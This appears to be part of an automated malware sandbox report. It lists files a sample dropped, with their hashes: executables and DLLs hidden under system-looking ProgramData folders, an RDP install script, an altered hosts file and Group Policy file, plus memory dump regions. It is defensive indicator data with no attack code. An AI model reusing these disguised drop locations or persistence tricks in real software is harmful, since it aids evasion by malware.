C:\ProgramData\Microsoft\Intel\Vega.exe
| MD5 | 92685bfb04ed955d8f963d626883a4d6 |
| SHA1 | 1e1ffe518101b1b79e3d6a6654f40e4d8b1a348a |
| SHA256 | 779ea638cecb0c1b584f159507695810c8af6c467586597207d23f8af5df1919 |
| SHA512 | d9b24a3f53bb10841727663ab939928eb6e1bd1e1387c6007c314bebe1c2a42d70c510f5b44955c8c6b463afc672cab7f8f9564c49509ec8486cbf6ff3d1cbfb |
C:\Programdata\Windows\vp8encoder.dll
| MD5 | 6298c0af3d1d563834a218a9cc9f54bd |
| SHA1 | 0185cd591e454ed072e5a5077b25c612f6849dc9 |
| SHA256 | 81af82019d9f45a697a8ca1788f2c5c0205af9892efd94879dedf4bc06db4172 |
| SHA512 | 389d89053689537cdb582c0e8a7951a84549f0c36484db4346c31bdbe7cb93141f6a354069eb13e550297dc8ec35cd6899746e0c16abc876a0fe542cc450fffe |
C:\Programdata\Windows\vp8decoder.dll
| MD5 | 88318158527985702f61d169434a4940 |
| SHA1 | 3cc751ba256b5727eb0713aad6f554ff1e7bca57 |
| SHA256 | 4c04d7968a9fe9d9258968d3a722263334bbf5f8af972f206a71f17fa293aa74 |
| SHA512 | 5d88562b6c6d2a5b14390512712819238cd838914f7c48a27f017827cb9b825c24ff05a30333427acec93cd836e8f04158b86d17e6ac3dd62c55b2e2ff4e2aff |
C:\Windows\System32\GroupPolicy\gpt.ini
| MD5 | ea3152149600326656e1f74ed207df9e |
| SHA1 | 361f17db9603f8d05948d633fd79271e0d780017 |
| SHA256 | f895f54a7397294132ebe13da0cf48f00028f5ccc81eac77eecafdec858e7816 |
| SHA512 | 5f79b3295a6a2c4b5c5720e26741ae5da2008165bcde01472e19362f7ffd4edabaea348bb99c2850871045cfb07fb0e51e6c3db7b2e278732a9f15f5b34f1a52 |
C:\ProgramData\microsoft\Temp\5.xml
| MD5 | 487497f0faaccbf26056d9470eb3eced |
| SHA1 | e1be3341f60cfed1521a2cabc5d04c1feae61707 |
| SHA256 | 9a8efbd09c9cc1ee7e8ff76ea60846b5cd5a47cdaae8e92331f3b7b6a5db4be5 |
| SHA512 | 3c6b5b29c0d56cfd4b717a964fac276804be95722d78219e7087c4ec787566f223e24421e0e3e2d8a6df5f9c9a5c07f1935f4ba7a83a6a3efa84866e2c1405dd |
memory/1540-237-0x0000000000400000-0x0000000000AB9000-memory.dmp
memory/1540-231-0x0000000000400000-0x0000000000AB9000-memory.dmp
memory/5104-291-0x0000000000400000-0x00000000009B6000-memory.dmp
memory/2608-309-0x0000000000400000-0x0000000000419000-memory.dmp
C:\ProgramData\Microsoft\Intel\Vegas.sfx.exe
| MD5 | 07cfae028935e4a7b515f9e3ae226b74 |
| SHA1 | 78d22c14b74f9e61c68d9ea5dc7fab999688dbab |
| SHA256 | 8ccdad395811424fc6e6f1cb0d2e4365dc917ac1bd952de0f2c2ac4aa1e6b9f8 |
| SHA512 | 2d2e19b4b4377ab83a743958146d9f8922ea96e4b40d3fd6fd230d027d6025d07e8da2d743a8bc0d5691557540fb3f62372485615d1d0968ada5559106d86de3 |
C:\programdata\microsoft\intel\MOS.exe
| MD5 | b9aadf42fd3e05be70ae6b34662dedcb |
| SHA1 | 7fc36004dd407e1cceff023a096d7f71c2a44cc5 |
| SHA256 | 892a6b108d1580381333b583bbd4e7bf45f6d7764181da12286d663693ec289d |
| SHA512 | 25af9883d53a9ad41cd0565ea509faf74d6a07b4ee5f2f604caafe9cfea39265855495e48ba79a742beb21f70a0e67e189369ec656360f6074fc30070e7a5809 |
C:\ProgramData\Microsoft\Intel\Vegas.exe
| MD5 | 30582dfb10c2eb7deaaa1d99b527f064 |
| SHA1 | 0dda4940ede6a790ab51b21110017e47fe9e7521 |
| SHA256 | 6f833c0bf680e2c3d345f10619a872f78ede66871052e3501c5444333afcf70f |
| SHA512 | e920b8ea074f20041a048173a4378e1f93ab44facecbf3484a5e1392ec3b18e3745e20eb39a5968914811340eb49553f6bbc155a48fbce28e1ace3a079d78eb5 |
C:\Users\Admin\AppData\Local\Temp\RarSFX0\M.exe
| MD5 | abe6371c10bf3250f82f85cdb4ab116f |
| SHA1 | 7e5e3563d61588c8ce4c5b8622b1c033b7cc9b9a |
| SHA256 | a478b0f7931ac9d228adbce9253849fac51145dcdbc9e39986ee0f83a4252ce2 |
| SHA512 | 6f2cfb8537530955315b30d8ea851f352fee424279f7341847236b486c5d9bfc871085920869828772fc2f787b736bab8ae2a076c35747435b027cb46664970c |
C:\rdp\install.vbs
| MD5 | 6d12ca172cdff9bcf34bab327dd2ab0d |
| SHA1 | d0a8ba4809eadca09e2ea8dd6b7ddb60e68cd493 |
| SHA256 | f797d95ce7ada9619afecde3417d0f09c271c150d0b982eaf0e4a098efb4c5ec |
| SHA512 | b840afa0fe254a8bb7a11b4dd1d7da6808f8b279e3bed35f78edcb30979d95380cfbfc00c23a53bec83fe0b4e45dcba34180347d68d09d02347672142bf42342 |
memory/1540-398-0x0000000000400000-0x0000000000AB9000-memory.dmp
memory/5104-400-0x0000000000400000-0x00000000009B6000-memory.dmp
memory/1284-399-0x0000000000400000-0x00000000009B6000-memory.dmp
memory/4848-406-0x0000000000400000-0x00000000009B6000-memory.dmp
memory/4848-410-0x0000000000400000-0x00000000009B6000-memory.dmp
memory/4848-408-0x0000000000400000-0x00000000009B6000-memory.dmp
memory/4848-409-0x0000000000400000-0x00000000009B6000-memory.dmp
memory/4848-407-0x0000000000400000-0x00000000009B6000-memory.dmp
memory/4848-411-0x0000000000400000-0x00000000009B6000-memory.dmp
memory/4848-414-0x0000000000400000-0x00000000009B6000-memory.dmp
memory/1540-459-0x0000000000400000-0x0000000000AB9000-memory.dmp
memory/3800-462-0x0000000000400000-0x000000000056F000-memory.dmp
memory/5104-461-0x0000000000400000-0x00000000009B6000-memory.dmp
memory/1284-460-0x0000000000400000-0x00000000009B6000-memory.dmp
memory/3800-507-0x0000000000400000-0x000000000056F000-memory.dmp
memory/1540-518-0x0000000000400000-0x0000000000AB9000-memory.dmp
memory/5104-531-0x0000000000400000-0x00000000009B6000-memory.dmp
memory/1524-670-0x0000000000400000-0x000000000056F000-memory.dmp
memory/1524-671-0x0000000000400000-0x000000000056F000-memory.dmp
memory/1540-723-0x0000000000400000-0x0000000000AB9000-memory.dmp
memory/1284-724-0x0000000000400000-0x00000000009B6000-memory.dmp
C:\Windows\System32\drivers\etc\hosts
| MD5 | 824e6bbee2e9d3df36ef9146b0b08a63 |
| SHA1 | 00a2c9f6b9012a9872ac4f2df271ba398d69d78a |
| SHA256 | 321a8e92d4a08656bbff84aba0e82f2d45c91d9bc0c65e2274f574938c8d7510 |
| SHA512 | 680f07b665f01978eda7b3157b0c1ead7020730f712b36eea9dc89ff6979241468c2d04c0ddae4f618ef6fd20357e4424cb64b85eb79e73f59988ecddf3b7816 |
memory/5104-725-0x0000000000400000-0x00000000009B6000-memory.dmp
memory/1540-843-0x0000000000400000-0x0000000000AB9000-memory.dmp
memory/5104-845-0x0000000000400000-0x00000000009B6000-memory.dmp
memory/1540-846-0x0000000000400000-0x0000000000AB9000-memory.dmp
memory/1540-850-0x0000000000400000-0x0000000000AB9000-memory.dmp